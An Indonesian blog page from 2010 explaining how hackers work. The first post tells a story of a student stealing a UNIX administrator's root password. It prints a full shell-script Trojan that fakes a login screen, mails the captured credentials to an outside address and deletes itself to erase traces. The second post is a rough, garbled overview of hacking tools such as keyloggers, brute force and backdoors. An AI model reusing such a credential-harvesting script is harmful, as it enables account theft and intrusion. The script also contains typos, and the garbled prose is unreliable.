Tampilkan postingan dengan label Memahami Hacker. Tampilkan semua postingan
Tampilkan postingan dengan label Memahami Hacker. Tampilkan semua postingan
Sabtu, 30 Oktober 2010

MEMAHAMI HACKER BEKERJA

Secara umum melalui tahapan-tahapan sebagai berikut :
1. Tahap mencari tahu system komputer sasaran.
2. Tahap penyusupan
3. Tahap penjelajahan
4. Tahap keluar dan menghilangkan jejak.
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
“Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu”, ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :P rogram kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo “login: \c”
read LOGIN
stty echo
echo “password: \c”
read PASSWORD
echo “User $LOGIN : $PASSWORD” | mail gadis@company.com
stty echo
echo
echo “Login Incorrect”
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.
source: iwan-net.blogspot.com

Bagaimana Cara Hacker Bekerja ?

kata "hacker" telah mendapat reputasi buruk. Pemanggilan kata sampai pikiran jahat pengguna komputer menemukan cara baru untuk mengganggu orang, menipu perusahaan, mencuri informasi dan mungkin bahkan menghancurkan perekonomian atau memulai perang dengan infiltrasi sistem komputer militer. Meskipun tidak ada menyangkal bahwa ada hacker di luar sana dengan niat buruk, mereka membuat hanya sebagian kecil dari masyarakat hacker.

Istilah hacker komputer pertama muncul di pertengahan tahun 1960-an. Seorang hacker adalah seorang programmer - seseorang yang keluar hacked kode komputer. Hacker visioner yang bisa melihat cara-cara baru untuk menggunakan komputer, membuat program yang tidak ada orang lain yang bisa hamil. Mereka adalah pelopor industri komputer, bangunan mulai dari aplikasi kecil untuk sistem operasi. Dalam pengertian ini, orang-orang seperti Bill Gates, Steve Jobs dan Steve Wozniak semua hacker - mereka melihat potensi apa yang komputer bisa melakukan dan menciptakan cara-cara untuk mencapai potensi itu.

Sifat pemersatu antara para hacker adalah rasa keingintahuan yang kuat, kadang-kadang berbatasan dengan obsesi. Hacker ini membanggakan diri pada kemampuan mereka tidak hanya untuk membuat program baru, tetapi juga untuk mempelajari bagaimana program lain dan sistem bekerja. Ketika sebuah program memiliki bug - bagian dari kode buruk yang mencegah program berfungsi dengan benar - hacker sering membuat dan mendistribusikan bagian kecil kode yang disebut patch untuk memperbaiki masalah. Beberapa berhasil mendapatkan pekerjaan yang leveraged keterampilan mereka, mendapatkan bayaran untuk apa yang mereka akan dengan senang hati melakukannya secara gratis.

Sebagai komputer berevolusi, insinyur jaringan komputer mulai mesin individu bersama-sama dalam suatu sistem. Segera, istilah hacker memiliki makna baru - orang yang menggunakan komputer untuk mencari jaringan yang ia tidak termasuk. Biasanya hacker tidak memiliki niat jahat. Mereka hanya ingin tahu bagaimana jaringan komputer bekerja dan melihat ada pembatas antara mereka dan bahwa pengetahuan sebagai tantangan.

Bahkan, yang masih terjadi hari ini. Walaupun ada banyak cerita tentang hacker jahat menyabot sistem komputer, menyusup dan menyebarkan virus jaringan komputer, hacker kebanyakan hanya ingin tahu - mereka ingin mengetahui semua seluk-beluk dunia komputer. Beberapa menggunakan pengetahuan mereka untuk membantu perusahaan dan pemerintah membangun langkah-langkah keamanan yang lebih baik. Orang lain mungkin menggunakan kemampuan mereka untuk berusaha lebih tidak etis.

Pada artikel ini, kita akan mengeksplorasi teknik hacker yang umum digunakan untuk menyusup ke sistem. Kami akan memeriksa budaya hacker dan berbagai jenis hacker serta belajar tentang hacker terkenal, beberapa di antaranya telah bertabrakan dengan hukum.

The Hacker Toolbox
Para hacker mengandalkan sumber daya utama, terlepas dari kecerdikan mereka sendiri, adalah kode komputer. Meskipun ada komunitas besar hacker di Internet, hanya sejumlah relatif kecil kode program hacker sebenarnya. Banyak hacker mencari dan men-download kode yang ditulis oleh orang lain. Ada ribuan program yang berbeda hacker gunakan untuk mengeksplorasi komputer dan jaringan. Program ini memberikan banyak hacker kekuasaan atas pengguna tidak bersalah dan organisasi - sekali seorang hacker terampil yang tahu bagaimana sistem bekerja, ia dapat merancang program yang mengeksploitasi itu.

Berbahaya hacker menggunakan program untuk:
Log keystrokes: Beberapa program memungkinkan hacker untuk meninjau setiap keystroke pengguna komputer membuat. Setelah diinstal di komputer korban, program keystroke catatan masing-masing, memberikan semua hacker ia harus menyusup sistem atau bahkan mencuri identitas seseorang.

Hack password: Ada banyak cara untuk hack password seseorang, dari dugaan dididik untuk algoritma sederhana yang menghasilkan kombinasi dari huruf, angka dan simbol. Sidang dan metode hacking password error disebut brute force attack, yang berarti hacker berusaha untuk menghasilkan setiap kombinasi yang mungkin untuk mendapatkan akses. Cara lain untuk hack password adalah dengan menggunakan serangan kamus, program yang menyisipkan kata umum dalam password.

Menginfeksi komputer atau sistem dengan virus: virus komputer adalah program yang dirancang untuk menduplikasi diri mereka sendiri dan menyebabkan masalah mulai dari crash komputer untuk menghapus segala sesuatu pada hard drive sistem itu. Seorang hacker mungkin menginstal virus dengan infiltrasi sistem, tapi jauh lebih umum bagi para hacker untuk membuat virus yang sederhana dan mengirim mereka keluar ke calon korban melalui email, pesan instan, situs Web dengan konten yang didownload atau peer-to-peer jaringan.

Keuntungan akses backdoor: Serupa dengan hacking password, beberapa hacker membuat program yang mencari perlindungan ke jalur sistem jaringan dan komputer. Pada hari-hari awal

zombie komputer: Sebuah komputer zombie, atau bot, adalah sebuah komputer yang hacker dapat digunakan untuk mengirim spam atau melakukan Distributed Denial of Service (DDoS) serangan. Setelah korban mengeksekusi kode yang tampaknya tidak bersalah, koneksi terbuka antara komputer dan sistem hacker. hacker diam-diam dapat mengontrol komputer korban, menggunakannya untuk melakukan kejahatan atau spam menyebar.
Memata-matai e-mail: Hacker telah menciptakan kode yang memungkinkan mereka mencegat dan membaca e-mail - setara dengan Internet untuk penyadapan. Saat ini, kebanyakan program e-mail menggunakan formula enkripsi begitu rumit bahwa meskipun hacker mencegat pesan, ia tidak akan dapat membacanya..

Recent Posts

====================Menu=====================


Jasa pembuatan akun adsense

advertisement>>